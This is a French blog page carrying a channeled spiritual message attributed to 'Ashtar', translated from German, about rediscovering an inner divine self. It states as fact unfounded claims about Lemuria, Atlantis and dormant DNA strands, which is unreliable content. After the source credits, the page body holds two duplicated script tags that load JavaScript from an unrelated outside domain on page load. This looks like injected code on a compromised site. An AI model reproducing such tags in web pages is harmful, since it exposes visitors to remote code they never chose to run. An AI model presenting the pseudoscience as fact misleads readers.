• À propos de la qualité de l’époque actuelle I

    ashtar sheran
    MESSAGES CANALISÉS PAR BLANDINA GELLRICH
     
     
    À propos de la qualité de l’époque actuelle I
    22 Avril 2014
     
    Ashtar : A propos de la qualité de l’époque actuelle – Titre original : « Ashtar : zur aktuellen Zeitqualität » – Avril 2014 – Transmis par Blandina Gellrich (Allemagne) – Aimablement traduit de l’Allemand par Sophia (Belgique) pour le site ashtar.sheran.free.fr – Un grand merci à Sophia.

    Chers sœurs et frères sur la Terre, voici Ashtar.

    ashtar06Je te salue. Aujourd’hui j’aimerais te parler d’une partie en toi qui attend que tu la redécouvres. Tu as déjà lu beaucoup au sujet de cette partie en toi. A certains moments cette partie a été désignée comme étant le dieu intérieur, d’autres fois comme étant la lumière intérieure ou encore comme étant ton soi authentique, ta partie créatrice ou ton âme. A d’autres époques il y avait encore d’autres concepts pour cela. En théorie tu sais cela, mais malgré tout cette partie t’est encore un peu étrangère. Tu essayes depuis longtemps de rencontrer cette partie en toi et de l’explorer. Mais ce n’est pas si simple. Ces derniers temps, même vos scientifiques ont essayé d’explorer cette partie. Elle n’est plus niée autant qu’auparavant. C’est dû au fait que les gens sur la Terre ne gobent plus aussi facilement ce déni. A quoi a servi ce déni et comment est-il né ? Permets-moi de te raconter une histoire. C’est ton histoire, de même que c’est l’histoire de chaque être vivant sur la Terre.

    A l’époque de la Lémurie, de l’Atlantide et des époques précédentes – oh elles ont existé – tu étais conscient(e) de cette partie en toi. Tu l’as ressentie et aimée. C’était ton centre de toute perception. Il était estimé et respecté. Car cette partie est ton essence, c’est ta nature originelle, ta vraie nature, actuellement désignée comme ton soi authentique. Elle inclut également la nature originelle de toute la création et donc ce qui est désigné aujourd’hui comme le plus grand secret. En ces époques, ce n’était pas un secret. Tous les êtres humains en étaient conscients. A partir de cette partie en toi, qui est ton noyau, tu as pensé, ressenti, entendu, senti, goûté.

    Puis a commencé l’époque de l’obscurcissement. L’obscurité, les époques sombres, sont les époques où tant de couches sont placées autour de ce noyau que tu n’as plus accès à ton essence. On en a fait quelque chose de mystérieux, de caché, et les êtres humains sur la Terre ont été détournés des portes et des accès à leur noyau divin intérieur. Et vu qu’ils ne pouvaient plus trouver cette partie à l’intérieur d’eux-mêmes, ils ont commencé à la chercher à l’extérieur. Il y a eu de nombreux miroirs, de nombreux dieux ont été adorés. Pour toi, ils avaient l’aspect de cette partie en toi. De ton point de vue, ces dieux étaient médiumniques, ils avaient accès à un Dieu qui dirige les Univers. Ils pouvaient créer des manifestations par leur pensée, ils avaient parfois des capacités de guérison, ils avaient du charisme et beaucoup de choses que tu ne pouvais plus trouver en toi. Certains de ces dieux venaient des mondes lumineux et d’autres des mondes de l’ombre. Bien souvent, tu ne pouvais pas faire la distinction. Ta perception était liée à « j’ai peu (de valeur) » par exemple. Et tu as commencé à admirer chez d’autres êtres vivants ce qui, au fond, est naturel et évident. Tout ce qui est « naturel » devenait quelque chose de spécial. Certains de ces dieux venus des mondes lumineux sur la Terre pour t’être un miroir, ont tellement apprécié cette admiration que cela a entraîné un attachement à la matière et ils sont devenus des êtres humains « normaux » et se sont retrouvé dans le cycle des incarnations – tout comme toi – et ils ont perdu leurs capacités divines. Des nombreux brins d’ADN (pas seulement 12), seul 2 se sont encore incarnés. Les autres brins d’ADN sont allé dans des zones en-dehors du corps physique.

    La différence principale entre les mondes lumineux et les mondes de l’ombre, c’est l’absence d’amour dans les mondes de l’ombre. C’est l’amour qui apporte la lumière. Lorsqu’un être vivant se trouve dans l’obscurité, alors il se trouve dans une énergie dense et lourde. Il ne sait rien voir, rien entendre, rien ressentir. C’est ainsi que se sont développés les sens physiques qui avaient besoin d’une orientation.  Que peuvent voir les yeux physiques ? Peuvent-ils voir l’amour, qui est partout ? Peuvent-ils voir les nombreuses expériences que chaque être vivant a vécues depuis des éternités ? Peuvent-ils voir les nombreux anges qui existent partout – sur la Terre également – ?

    Actuellement, l’énergie des mondes lumineux afflue de manière accrue sur la Terre. Cela provoque un réveil. L’amour fait de nouveau son apparition sur la Terre. L’amour apporte de la lumière. C’est pourquoi tu perçois maintenant mieux les structures de la Terre et leurs effets. Grâce à cette perception, tu peux différencier et tu as le choix, tu vois ce que tu veux abandonner et ce à quoi tu désire te connecter.  Pour le moment, il s’agit avant tout d’un lâcher-prise et d’une connexion intérieurs. Tu  t’étends et par cette extension tu te connectes à nouveau avec les brins d’ADN qui, jusqu’à présent, reposaient dans ton corps de lumière. Tu étends donc ton corps physique vers le corps de lumière. Cette extension a lieu lorsque tu enlèves les couches qui se sont mises autour de ton noyau, de ton essence. Tu enlèves ces couches en les nettoyant, en les transformant, en les guérissant et puis en les intégrant. Ainsi tu découvres à nouveau le dieu, le créateur en toi. Tu découvres à nouveau que chaque pensée est créatrice. A chaque respiration, tu as créé quelque chose. Des fois de la richesse, des fois un manque. Tu as toujours vécu et tu vivras toujours le créateur en toi. C’est la seule forme que tu ne sais pas dissoudre, car  elle est l’amour inconditionnel. La création est inconditionnelle. Tu as été créé à partir de cet amour inconditionnel et tu le porte toujours en toi. Tu es cet amour. Tu peux dissoudre toutes les autres formes qui sont nées d’un être vivant exprimant cet amour inconditionnel – également les formes qui comportent des conditions. Toutes ces formes ne sont pas originelles. Lorsque tu es conscient de ce caractère originel, que tu ne peux pas trouver à l’extérieur mais uniquement au fond de toi, alors commence la création consciente. Tout le reste n’est que création inconsciente.

    Je t’invite donc à inspirer et à expirer profondément. Perçois tes pensées comme des enfants qui veulent jouer. A quoi jouent-elles en ce moment ? Que ressentent-elles lors de ce jeu ? De la peur ? La peur est une expression de l’aveuglement et de l’oubli de soi. Envoie-leur de l’amour et donc de la lumière. Que se passe t-il ? Observe simplement.

    A l’époque actuelle, il est important que tu commences à penser consciemment, à voir consciemment, à entendre consciemment et à ressentir consciemment, sans juger et sans analyser. Alors commence la connexion avec ton Être originel.

    Avec un amour profond
    Ashtar


    Traduit de l’Allemand par Sophia (Belgique)  -  Copyright : Blandina soya shivi Gellrich  -  Tel.: (040) 5 11 38 28 – kontakt@licht-der-seele.net  -  Le site de Blandina Gellrich est accessible sur http://www.licht-der-seele.net  -  Le texte peut être reproduit et diffusé, à condition de ne pas le modifier et de mentionner la source.   Source : http://ashtar.sheran.free.fr/
    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script><script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

  • Commentaires

    Aucun commentaire pour le moment

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :